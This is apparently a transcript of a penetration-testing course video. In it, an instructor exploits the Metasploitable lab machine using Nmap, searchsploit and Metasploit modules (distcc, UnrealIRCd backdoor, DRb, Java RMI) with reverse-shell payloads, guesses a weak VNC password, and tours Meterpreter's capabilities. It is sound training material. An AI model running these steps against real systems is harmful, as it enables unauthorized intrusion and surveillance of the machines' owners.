00:00:00,660 --> 00:01:13,563
Okay, it is time for a small challenge. We can say we are getting more and more familiar with MSFconsole and exploitation, and by now you should be familiar with the entire process of searching for a vulnerability and trying to exploit it. Let's put all of that to the test. So for now, we covered about four to five vulnerabilities on the Metasploitable virtual machine. And what I want you to do in this video is find three different vulnerabilities that will give you a shell back on the target machine. You can use any tools that you want, besides searching for links that will give you the exact steps to exploiting the vulnerability. And feel free to use Google if you want to, to see if a software is vulnerable. You can also use searchsploit to see whether you have an exploit in your database. You can use Nmap to scan and Metasploit Framework to exploit. After we do this challenge, we are ready to move on to some harder Windows exploits. And after that we're going to see how to exploit the target without using MSFconsole and without having an exploit available inside of our Kali machine.

00:01:14,430 --> 00:02:28,710
Okay, great. So pause this video right now. Give yourself 10 to 20 minutes and try to find three different vulnerabilities on the Metasploitable that will give you a shell back. I myself will do it right now. So if you don't want me to spoil it for you, then try to find them first and then watch this video. The harder part is to find them; however, once you find them it is easy to exploit them. Let's get straight into it. Let's start by scanning the target for all the open ports and its services. So what I'm going to do is I will perform the usual Nmap version scan on my Metasploitable, with -sV -p-, where -p- stands for scan all 65,000 ports. If I press enter here, enter my password. And by the way, of course the vulnerabilities that we covered don't count at the moment. We will not pay attention to them at all right now. We want to find new vulnerabilities. So while this scan is working, I will go to a second terminal and I will start the MSFconsole, and I will also open a third terminal in case we need something like searchsploit or some other tool to run right here.

00:02:28,710 --> 00:03:54,390
So the goal is to find three vulnerabilities. Let's see after our scan finishes whether we manage to do so. And here are the results of the scan. So we got a bunch of ports open as usual, and let's go and pick any one of them. For example, I know for a fact that this distcc open port, which is 3632, is vulnerable. It is running distcc version 1. And if I go to my Metasploit Framework and I just type search distcc, I will only get one exploit available: distcc_exec, or Daemon Command Execution. It is ranked excellent. So since this is the only exploit, let's give it a try. I will copy it, I will type use and then paste the exploit name, clear the screen. We can show info just to know what this exploit does. And it says that this module uses a documented security weakness to execute arbitrary commands on any system running distccd. And our system is indeed running distccd. So what we are going to do is we are going to type show options and set the RHOSTS to be the IP address of our Metasploitable. Let's see, show payloads. So we got quite a few payloads right here.

00:03:54,390 --> 00:05:17,850
Let us use this one: cmd/unix/reverse. So this is reverse TCP over telnet. Let's set it right here, since at the moment, if I show options, we don't have any payload set up. Let's set payload cmd/unix/reverse, show options once again. Now we need to set the LHOST. So I will type sudo ifconfig, enter my password; my IP address is 192.168.1.8. Let's copy it and let's set our LHOST to be equal to that IP address. Now if we triple check all of our available options, we should be good to go. Let us run our exploit, and here it is. First one is over. We got the command shell session one opened on the target machine. If I type whoami, we're daemon. If I type ls or print working directory, we are in the /tmp directory. The hostname command will tell us that we are metasploitable, and uname -a will tell us that we're Linux metasploitable 2.6.24. And here we also get some other information such as date and which version of Linux it is. Great. So first one is done.

00:05:17,850 --> 00:06:47,220
Let us Ctrl+C this, abort session one, select yes, and let's go back to our scan to find another vulnerability. So if you remember during our scans, once you perform the vulnerability scan, we noticed that this UnrealIRCd was vulnerable. We got from some of our scan results that this specific service is vulnerable to some type of attack. So let's give it a try. Let's go to our searchsploit and type searchsploit irc. And this gives us a bunch of different information. So this isn't really useful for us. Let's try it like this. Let's go to our scan and copy UnrealIRCd, which is the version. And now if I type searchsploit and the name of the version, well, we narrow it down to four results, and one of them doesn't count since it is remote denial of service. Out of all of this we got one Ruby exploit, which means it belongs to Metasploit Framework. It is for version 3.2.8 and it is backdoor command execution. Let's search it inside of our Metasploit Framework. So search and then unrealirc. And we do indeed get only one exploit for this. It is ranked excellent and it is from 2010.

00:06:47,220 --> 00:08:12,030
Let's copy it right here. Copy selection, and as usual, use this exploit. Show info will tell us that this module exploits a malicious backdoor that was added to the UnrealIRCd 3.2.8 download archive. So as it says, this module will exploit some malicious backdoor that was added in this specific version. And if we show options, we need to set the RHOSTS as in the previous exploit, and we also need to set the payload. But before we set it, let's show our available payloads first. Show payloads, pardon me, not show options, and we get the same result as previously. So we are just going to go with the reverse TCP over telnet, and if I type set payload and then paste the payload name. Now we need to set the LHOST to be the IP address of our Kali Linux machine. And if we triple check our options, everything is set; type run, and here it is, command shell session two open. We got the second exploit down; let's check out if it works. whoami? We are the root account. hostname will tell us we are metasploitable. So this is the second one down.

00:08:12,030 --> 00:09:22,200
We got one more left to go. Let's Ctrl+C this. Go back to our scan. And we are doing this at a really fast tempo because we already are familiar with all of these tools and techniques that we use to exploit these vulnerable softwares. If you didn't manage to find three different exploits, don't worry. This comes with practice. So after some time practicing you'll be able to find even more than three exploits. Let's continue on to the third one. So if we go down here and check out what different services we got running, this one, which is running over port 8787, is running the service drb. I know for a fact that it is vulnerable, so let's give it a try. The service name is drb. So if I type in my searchsploit drb, well, we only get a few results right here, and it doesn't seem that any one of them belongs to the Metasploit Framework, as we can see right here, since these are Python files. So let's just double check. Whoops, not here.

00:09:22,200 --> 00:10:48,215
Let's just double check right here if we can find something regarding drb, and we do manage to find it. So we got these two exploits which are for the multi, and we got this DRb remote code execution, and it says Distributed Ruby remote code execution. And if I go right here under the version, we can see that it is running Ruby. So let's just give it a try. You never know. If we copy this exploit which says drb remote code execution, and we use it right here, show our options. We can see by default it has set the payload to be cmd/unix/reverse_netcat, and we got two different things to set up. Matter of fact, one of them is URI, which is not really needed. So we can only set our RHOSTS, and for some reason it does say that RHOSTS is not required, but I'm not really sure how it is not required. So we will just specify it anyway. Set RHOSTS 192.168.1.7. Since the payload has already been set, let us just run the exploit, and here it is. We got command shell session three open. Let's type whoami. We are root account.

00:10:48,215 --> 00:12:06,150
And once again, hostname will tell us we're the metasploitable machine. And with this we completed our challenge. We found three different vulnerabilities that gave us a shell back, but these are not the only ones. So matter of fact, let me just show you one or two more that you could have found if you performed this challenge. The one that is a little bit different to exploit is this VNC service running on port 5900. It is running protocol 3.3. And if we just search in the searchsploit, search bnc, oops, searchsploit vnc, we will get a bunch of results right here. So let's add the version 3.3, and we do get some of the responses right here, but it does say that these are for Windows. Now we are not going to give up just because we cannot find the exploit using searchsploit. Matter of fact, it probably is somewhere right here; there are just a bunch of results and we don't really want to read through all of this to find the exploit that we need. So let's just go straight to Metasploit and type search vnc. And if I scroll all the way up, since these are just payloads, I come to exploits.

00:12:06,150 --> 00:13:27,000
We can see there are about five or six exploits, and these four are for Windows. So we can forget about them straight away. We got this one and we got this one. This one seems interesting. It is an exploit for multiple operating systems for VNC, and it says VNC keyboard execution. So let's just copy the name and see whether it works. Now this is just a part of a penetration test. If you don't know an exact exploit, you simply just try a few different ones and see if they work. Just get used to it that some exploits will sometimes not work, and you will have no idea why they don't work. So let's just type set, or pardon me, let's just type use, and then the exploit name. And this seems that it isn't an exploit for us, since it is also setting the Windows payload. Hmm, we cannot find a VNC exploit. So what are we going to do? Well, if I go right here and instead of searching for an exploit, I simply just try to connect to the VNC using a tool called vncviewer. And all I need to specify to connect is the IP address of that target machine. Press enter.

00:13:27,000 --> 00:14:53,910
Hmm, it seems to be asking for a password. Well, let's try msfadmin, which is the usual password for everything in Metasploitable, and it tells us authentication failure. But if we try it once again and as a password I simply just type password. Well, it worked. The VNC viewer password was just password, and now I got a root shell open on the Metasploitable. I can execute commands right here such as ifconfig, such as hostname, ls, and I can see anything that is on the target machine. So this exploit was a little bit different because it was due to a weak password. I just connected to the VNC and I typed password, and it granted access to the root shell of the Metasploitable. Great, to exit this I can type exit and I can exit this desktop right here. And let me show you just one more and then we are going to end the video, and that one is over port 1099. It is running Java RMI. And if I go in my Metasploit Framework and search for java_rmi, well, we get two exploits right here. Let's try with this one first. So exploit/multi/misc/java_rmi_server.

00:14:53,910 --> 00:16:14,553
Copy the exploit name, go right here and type use. It will set the default payload to be java/meterpreter/reverse_tcp. Now this is the first time that we are encountering a Meterpreter payload. You will see that it is a little bit different than all the other shells that we got in the previous exploits. So if you type show options, there are a bunch of things that I need to set. Our payload options have already been set to the correct one, to the correct IP address and to the correct port. All we need to set right here is the RHOSTS. You can just leave the server host and server port to be 0.0.0.0 and 8080. If I go right here and type set RHOSTS 192.168.1.7 and I run this, well, here it is, we got the Meterpreter session four open. And if you want to execute the commands, you can just wait for this exploit to finish. And even though it says right here exploit failed, if I type sessions, I will have the Meterpreter session four, and I can enter that session by typing sessions and then -i and then the ID of that session, which in my case is four.

00:16:15,780 --> 00:17:21,089
And I've entered the Meterpreter shell. Right here the commands are different. To check out all of the commands that we can run with the Meterpreter, we can type the help command. And you can see it is split into different sections, such as file system commands, such as core commands. And all of these commands work with the Meterpreter shell. We can download and upload files, we can execute a command, we can screenshare, we can perform a screenshot of the target machine, we can record the microphone, and many other things that we're going to check out later. But for now we can use a command called shell to enter the command shell with the target machine. So if you type whoami once again, right now I am a root account with the IP address of the Metasploitable. Great. Now I left this Meterpreter shell for the end just so we can slowly start getting into using the Meterpreter shell on our target machine. As we can see there are a lot of commands that we can run.

00:17:21,089 --> 00:17:51,700
Now in the next video we're going to start with Windows exploitation, and in Windows exploitation we are most likely always going to want to open a Meterpreter shell. So that would be about it for this challenge. Once again, if you managed to find three different vulnerabilities, congratulations. If not, don't worry. This comes with practice. Now that we covered Metasploitable vulnerabilities, which were rather easy, it is time to move on to the Windows vulnerabilities. See you in the next video.